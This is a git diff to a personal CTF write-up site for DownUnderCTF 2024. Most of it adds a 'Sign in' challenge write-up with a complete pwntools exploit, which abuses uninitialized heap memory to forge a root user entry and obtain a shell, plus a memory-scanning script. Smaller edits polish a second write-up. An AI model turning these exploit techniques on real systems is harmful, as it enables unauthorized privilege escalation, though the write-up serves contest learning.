sign in writeup

sukolenvo · sukolenvo · commit 5bb42cf33631 · 2024-07-20T07:25:09.000+08:00
diff --git a/mkdocs.yml b/mkdocs.yml
@@ -16,7 +16,7 @@ nav:
   - Decrypt then eval: ./decrypt_eval/index.md
   - Yawa: ./yawa/index.md
   - DNAdecay: ./dna/index.md
-#  - Sign in: ./sign_in/index.md
+  - Sign in: ./sign_in/index.md
   - sssshhhh: ./sssshhhh/index.md
 #  - Rusty vault: ./rusty/index.md
 #  - Jmp flag: ./jmp_flag/index.md
diff --git a/solve/sign_in/index.md b/solve/sign_in/index.md
@@ -187,10 +187,7 @@ struct user_entry {
 };
 ```
 
-In memory it would look like like this:
-
-* 3 user_entries with addresses 0x100000, 0x100040, 0x100080
-* 3 user accounts with addresses 0x100020, 0x100060, 0x1000a0 (root, bob and alice)
+Example of memory layout of 3 user_entries (0x100000, 0x100040, 0x100080) with 3 user accounts (0x100020, 0x100060, 0x1000a0 (root, bob and alice)):
 
 ```graphviz dot attack_plan.svg
 digraph g {
@@ -214,8 +211,8 @@ graph [
     "element0" [
     	label=<<table border="0" cellborder="1" cellspacing="0" cellpadding="4">
 			<tr> <td PORT="head"> <b>user_entry 0x100000 </b></td> </tr>
-			<tr> <td align="left" PORT="prev"> prev: null </td> </tr>
 			<tr> <td align="left" PORT="user"> user: 0x100020 </td> </tr>
+			<tr> <td align="left" PORT="prev"> prev: null </td> </tr>
 			<tr> <td align="left" PORT="next"> next: 0x100040 </td> </tr>
 		</table>>
 		fillcolor="#88ff0022"
@@ -224,8 +221,8 @@ graph [
     "element1" [
     	label=<<table border="0" cellborder="1" cellspacing="0" cellpadding="4">
 			<tr> <td PORT="head"> <b>user_entry 0x100040 </b></td> </tr>
-			<tr> <td align="left" PORT="prev"> prev: 0x100000 </td> </tr>
 			<tr> <td align="left" PORT="user"> user: 0x100060 </td> </tr>
+			<tr> <td align="left" PORT="prev"> prev: 0x100000 </td> </tr>
 			<tr> <td align="left" PORT="next"> next: 0x10080 </td> </tr>
 		</table>>
 		fillcolor="#88ff0022"
@@ -234,8 +231,8 @@ graph [
     "element2" [
     	label=<<table border="0" cellborder="1" cellspacing="0" cellpadding="4">
 			<tr> <td PORT="head"> <b>user_entry 0x100080 </b></td> </tr>
-			<tr> <td align="left" PORT="prev"> prev: 0x100040 </td> </tr>
 			<tr> <td align="left" PORT="user"> user: 0x1000a0 </td> </tr>
+			<tr> <td align="left" PORT="prev"> prev: 0x100040 </td> </tr>
 			<tr> <td align="left" PORT="next"> next: null </td> </tr>
 		</table>>
 		fillcolor="#88ff0022"
@@ -331,15 +328,11 @@ long sign_in() {
 }
 ```
 
-So it `sing_in` will iterate over `next` values until it reaches null and treat memory at this `next` address as holder for
-username and password.
-
 When we delete user, memory would look like:
 
-
 * 2 user_entries with addresses 0x100000, 0x100040
 * 2 user accounts with addresses 0x100020, 0x100060 (root, bob)
-* two recycled memory blocks that will be aviailable for view allocations: 0x100080, 0x1000a0
+* two recycled memory blocks that will be available for view allocations: 0x100080, 0x1000a0
 
 ```graphviz dot attack_plan.svg
 digraph g {
@@ -362,8 +355,8 @@ graph [
     "element0" [
     	label=<<table border="0" cellborder="1" cellspacing="0" cellpadding="4">
 			<tr> <td PORT="head"> <b>user_entry 0x100000 </b></td> </tr>
-			<tr> <td align="left" PORT="prev"> prev: null </td> </tr>
 			<tr> <td align="left" PORT="user"> user: 0x100020 </td> </tr>
+			<tr> <td align="left" PORT="prev"> prev: null </td> </tr>
 			<tr> <td align="left" PORT="next"> next: 0x100040 </td> </tr>
 		</table>>
 		fillcolor="#88ff0022"
@@ -372,9 +365,9 @@ graph [
     "element1" [
     	label=<<table border="0" cellborder="1" cellspacing="0" cellpadding="4">
 			<tr> <td PORT="head"> <b>user_entry 0x100040 </b></td> </tr>
-			<tr> <td align="left" PORT="prev"> prev: 0x100000 </td> </tr>
 			<tr> <td align="left" PORT="user"> user: 0x100060 </td> </tr>
-			<tr> <td align="left" PORT="next"> null </td> </tr>
+			<tr> <td align="left" PORT="prev"> prev: 0x100000 </td> </tr>
+			<tr> <td align="left" PORT="next"> next: null </td> </tr>
 		</table>>
 		fillcolor="#88ff0022"
 		shape=plain
@@ -447,9 +440,10 @@ graph [
     ]
 }
 ```
+Note that recycled memory is not zeroed out, it still contains data.
 
 Now if we create a new user, recycled memory 0x100080 and 0x1000a0 will be reused for user account and user entry. Note that last
-freed in `remove_account` item will be reused first by malloc in sign_up (effectively swaping addresses of user_entry and user account).
+freed blocked in `remove_account` item will be used first by malloc in sign_up (LIFO, effectively swaping addresses of user_entry and user account).
 This change is highlighted compared to _figure 1_:
 
 ```graphviz dot attack_plan.svg
@@ -529,9 +523,9 @@ graph [
     "user2" [
     	label=<<table border="0" cellborder="1" cellspacing="0" cellpadding="4">
 			<tr> <td PORT="head" BGCOLOR="#b2b3b4aa"> <b>user 0x100080 </b></td> </tr>
-			<tr> <td align="left"> id: 2 </td> </tr>
-			<tr> <td align="left"> username: alice </td> </tr>
-			<tr> <td align="left"> password: pasword2 </td> </tr>
+			<tr> <td align="left"> id: 3 </td> </tr>
+			<tr> <td align="left"> username: james </td> </tr>
+			<tr> <td align="left"> password: password3 </td> </tr>
 		</table>>
 		fillcolor="#0044ff22"
 		shape=plain
@@ -546,25 +540,224 @@ graph [
 
 As you can see on figure3, password of deleted user is used as address of the next user entry. So our plan is:
 
-1. Find memory address that can be interpreted as user account with user account data structured with id 0 and username and password that we know.
-2. Create user account user1 using address from step 1 as a password.
+1. Find memory address that can be interpreted as user entry for account with id 0 and username and password that we know.
+2. Create user account using address from step 1 as a password.
 3. Delete the account.
-4. Create new account user2, this will trigger the exploit and create new entry with `next` set to address we selected in step 1.
+4. Create new account, this will trigger the exploit and create new entry with uninitialized `next` value. It will be address we selected in step 1. Not so "undeterminate", huh?
 5. Sign in with username and password that we got in step 1.
 
-**Step 1**: we are looking for memory address for data structure:
+**Step 1**: scan memory
+
+We are looking for address that points to user account structure:
 ```c
 typedef struct {
     long uid;
     char username[8];
     char password[8];
 }
 ```
-We want uid to be 0, and username and password to be known. The best place to start in my opinion is binary code itself as
-its static and we can scan it.
+Uid should be 0, and username and password any as long as we know it. 
+
+Time to check binary protection:
+```bash
+$ checksec --file=app                        
+RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols         FORTIFY Fortified       Fortifiable     FILE
+Partial RELRO   Canary found      NX enabled    No PIE          No RPATH   No RUNPATH   54 Symbols        No    0               2               app
+```
 
+PIE is disabled. This means code will be loaded always to the same addresses. This looks like the best place to look for pointer to 
+user account as its value will be same every time app launched.
+
+Module entry point is 0x400000, we can see it in process mapping:
+```bash hl_lines="2"
+$ cat /proc/5539/maps
+00400000-00401000 r--p 00000000 08:01 1209740                            /home/kali/Downloads/app
+00401000-00402000 r-xp 00001000 08:01 1209740                            /home/kali/Downloads/app
+00402000-00403000 r--p 00002000 08:01 1209740                            /home/kali/Downloads/app
+00403000-00404000 r--p 00002000 08:01 1209740                            /home/kali/Downloads/app
+00404000-00405000 rw-p 00003000 08:01 1209740                            /home/kali/Downloads/app
+7f70658c0000-7f70658c3000 rw-p 00000000 00:00 0 
+7f70658c3000-7f70658e9000 r--p 00000000 08:01 440309                     /usr/lib/x86_64-linux-gnu/libc.so.6
+7f70658e9000-7f7065a40000 r-xp 00026000 08:01 440309                     /usr/lib/x86_64-linux-gnu/libc.so.6
+7f7065a40000-7f7065a95000 r--p 0017d000 08:01 440309                     /usr/lib/x86_64-linux-gnu/libc.so.6
+7f7065a95000-7f7065a99000 r--p 001d1000 08:01 440309                     /usr/lib/x86_64-linux-gnu/libc.so.6
+7f7065a99000-7f7065a9b000 rw-p 001d5000 08:01 440309                     /usr/lib/x86_64-linux-gnu/libc.so.6
+7f7065a9b000-7f7065aa8000 rw-p 00000000 00:00 0 
+7f7065ac9000-7f7065acb000 rw-p 00000000 00:00 0 
+7f7065acb000-7f7065acc000 r--p 00000000 08:01 440306                     /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2
+7f7065acc000-7f7065af1000 r-xp 00001000 08:01 440306                     /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2
+7f7065af1000-7f7065afb000 r--p 00026000 08:01 440306                     /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2
+7f7065afb000-7f7065afd000 r--p 00030000 08:01 440306                     /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2
+7f7065afd000-7f7065aff000 rw-p 00032000 08:01 440306                     /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2
+7ffe04ef5000-7ffe04f16000 rw-p 00000000 00:00 0                          [stack]
+7ffe04fc4000-7ffe04fc8000 r--p 00000000 00:00 0                          [vvar]
+7ffe04fc8000-7ffe04fca000 r-xp 00000000 00:00 0                          [vdso]
+```
+
+Script to find address that points to memory that can be interpreted as user account with id 0:
+
+```python title="script.py"
+# start scan of memory at base address of the application
+module_start = 0x400000
+# we only interested in readonly memory (24 bytes padding for safety as user structure is 24 bytes long)
+module_end = 0x404000 - 24
+
+# iterate over memory addresses
+for i in range(module_start, module_end):
+    # read value stored at i (unpack convertes from little endian byte array into int)
+    addr = unpack(elfexe.read(i, 8))
+    # if value i is a number in range module_start..module_end it can be interpreted as address.
+    # Also check value that address i is pointing to, target application will treat that value as user ID.
+    # We are looking for user ID equal to 0
+    if module_start < addr < module_end and unpack(elfexe.read(addr, 8)) == 0:
+        fake_root_entry = i
+        break
+
+# use fake user entry that we found to calculate user account details
+fake_account_address = unpack(elfexe.read(fake_root_entry, 8))
+# first field of user structuture is user ID 8 bytes
+fake_account_id = unpack(elfexe.read(fake_account_address, 8))
+# second field (offset 8) in user structure is username 8 bytes
+fake_account_username = elfexe.read(fake_account_address + 8, 8)
+# third field (offset sum of length previous files 8 + 8) in user structure is password 8 bytes
+fake_account_password = elfexe.read(fake_account_address + 16, 8)
+
+print(f"fake entry address {hex(fake_root_entry)}")
+print(f"{fake_account_id=}")
+print(f"fake account username {binascii.hexlify(fake_account_username)}")
+print(f"fake account password {binascii.hexlify(fake_account_password)}")
+```
+
+```bash title="output.txt"
+fake entry address 0x403eb8
+fake_account_id=0
+fake account username b'0000000000000000'
+fake account password b'0000000000000000'
+```
+
+**Steps 2-5**: exploit
+
+I used pwntools to automate necessary steps (account creation, sign in, deletion etc...):
+
+```python
+io.recvuntil(b"> ")                 # wait till target application is initialized
+io.sendline(b'1')                   # enter choice 1 - create account
+io.recvuntil(b":")                  # wait username prompt
+io.sendline(b"one")                 # enter username
+io.recvuntil(b":")                  # wait password prompt
+io.sendline(pack(fake_root_entry))  # send address as fake root entry as password (converting into little endian)
+io.recvuntil(b"> ")                 # wait prompt
+io.sendline(b'2')                   # enter choice 2 - sign in
+io.recvuntil(b":")                  # wait username prompt
+io.sendline(b"one")                 # enter username
+io.recvuntil(b":")                  # wait password prompt
+io.sendline(pack(fake_root_entry))  # enter password
+io.recvuntil(b"> ")                 # wait prompt
+io.sendline(b'3')                   # enter choice 3 - remove account
+io.recvuntil(b"> ")                 # wait prompt
+io.sendline(b'1')                   # enter choice 1 - create account
+io.recvuntil(b":")                  # wait username prompt
+io.sendline(b"two")                 # enter username
+io.recvuntil(b":")                  # wait password prompt
+io.sendline(b"two")                 # enter password
+io.recvuntil(b"> ")                 # wait prompt
+io.sendline(b'2')                   # enter choice 2 - signup
+io.recvuntil(b":")                  # wait username prompt
+# enter username and password of our fake user account
+# note that both fields are concatenated.
+# if we use sendline(fake_account_username) then sendline(fake_account_password)
+# then first sendline would append '\n' and password wont match
+io.sendline(fake_account_username + fake_account_password)
+io.recvuntil(b"> ")                 # wait prompt
+io.sendline(b'4')                   # enter choice 4 - Get shell
+```
+
+And full script:
+
+??? success "solve.py"
+    ```py
+    from pwn import *
+    
+    context.binary = elfexe = ELF('./app') 
+    libc = elfexe.libc 
+    
+    context.log_level = 'warn'
+    
+    arguments = []
+    if args['REMOTE']:
+        remote_server = '2024.ductf.dev' 
+        remote_port = 30022  
+        io = remote(remote_server, remote_port)
+    else:
+        io = process([elfexe.path] + arguments)
+    
+    # start scan of memory at base address of the application
+    module_start = 0x400000
+    # we only interested in readonly memory (16 bytes padding for safety as user structure is 24 bytes long)
+    module_end = 0x404000 - 24
+    
+    # iterate over memory addresses
+    for i in range(module_start, module_end):
+        # read value stored at i (unpack convertes from little endian byte array into int)
+        addr = unpack(elfexe.read(i, 8))
+        # if value i is address in range module_start..module_end
+        # then read value that i is pointing to - its user ID, if user ID is 0 then we found good address
+        # to use as fake user entry
+        if module_start < addr < module_end and unpack(elfexe.read(addr, 8)) == 0:
+            fake_root_entry = i
+            break
+    
+    # use fake user entry that we found calculate user account details
+    fake_account_address = unpack(elfexe.read(fake_root_entry, 8))
+    fake_account_id = unpack(elfexe.read(fake_account_address, 8))
+    fake_account_username = elfexe.read(fake_account_address + 8, 8)
+    fake_account_password = elfexe.read(fake_account_address + 16, 8)
+    
+    print(f"fake entry address {hex(fake_root_entry)}")
+    print(f"{fake_account_id=}")
+    print(f"fake account username {binascii.hexlify(fake_account_username)}")
+    print(f"fake account password {binascii.hexlify(fake_account_password)}")
+    
+    io.recvuntil(b"> ")                 # wait till target application initialised
+    io.sendline(b'1')                   # enter choice 1 - create account
+    io.recvuntil(b":")                  # wait username prompt
+    io.sendline(b"one")                 # enter username
+    io.recvuntil(b":")                  # wait password prompt
+    io.sendline(pack(fake_root_entry))  # send address as fake root entry as password (converting into little endian)
+    io.recvuntil(b"> ")                 # wait prompt
+    io.sendline(b'2')                   # enter choice 2 - sign in
+    io.recvuntil(b":")                  # wait username prompt
+    io.sendline(b"one")                 # enter username
+    io.recvuntil(b":")                  # wait password prompt
+    io.sendline(pack(fake_root_entry))  # enter password
+    io.recvuntil(b"> ")                 # wait prompt
+    io.sendline(b'3')                   # enter choice 3 - remove account
+    io.recvuntil(b"> ")                 # wait prompt
+    io.sendline(b'1')                   # enter choice 1 - create account
+    io.recvuntil(b":")                  # wait username prompt
+    io.sendline(b"two")                 # enter username
+    io.recvuntil(b":")                  # wait password prompt
+    io.sendline(b"two")                 # enter password
+    io.recvuntil(b"> ")                 # wait prompt
+    io.sendline(b'2')                   # enter choice 2 - signup
+    io.recvuntil(b":")                  # wait username prompt
+    # enter username and password of the fake entity that has id 0
+    # note that both fields are concatenated.
+    # if we use sendline(fake_account_username) then sendline(fake_account_password)
+    # then because sendline appends '\n' it would be treated as part of password and sign in fails
+    io.sendline(fake_account_username + fake_account_password)
+    io.recvuntil(b"> ")                 # failed prompt
+    io.sendline(b'4')                   # enter choice 4 - Get shell
+    
+    # we should have remove shell now - switch to interactive mode
+    io.interactive()
+    io.close()
+    ```
 
 ## Epilogue
 
 * Official website: [https://downunderctf.com/](https://downunderctf.com/)
 * Official writeups: https://github.com/DownUnderCTF/Challenges_2024_Public
+
+*[PIE]: Position Independent Executable
+*[LIFO]: Last In First Out
diff --git a/solve/sssshhhh/index.md b/solve/sssshhhh/index.md
@@ -45,9 +45,9 @@ $ ./server
 
 When we try to ssh to it we see that it requires a password. So lets open in [Ghidra](https://ghidra-sre.org/) and see if we can find it.
 
-`main` function has calls `startLogger()` and `RunSSH()`. Second one is interesting - it should initialise user accounts somehow. In code there are a lot of
+`main` function has calls `startLogger()` and `RunSSH()`. Second call is interesting - it should initialise user accounts somehow. In code there are a lot of
 references to https://github.com/charmbracelet/ssh which is a go package for embeded ssh server. In the documentation and examples of the 
-library we can see how usually password authentication is configured https://pkg.go.dev/github.com/gliderlabs/ssh#PasswordAuth so we know what 
+library we can see how usually password authentication is configured https://pkg.go.dev/github.com/gliderlabs/ssh#PasswordAuth, so we know what 
 to look for. 
 
 Two interesting lines in `RunSSH()` that caught my eye:
@@ -75,7 +75,7 @@ undefined8 main.RunSSH.func2(long param_1,undefined8 param_2,undefined8 param_3,
   return uVar1;
 }
 ```
-It compares some number (length?) to 0x23 and then calls `memequal`. Strangely, memequel doesn't take any params. Eventually I checked disassembly:
+It compares some number (length?) to 0x23 and then calls `memequal`. Strangely, `memequel` doesn't take any params. Eventually I checked disassembly for this line:
 ```asm
 MOV        RAX,param_4
 LEA        RBX,[DAT_0067ec99] 
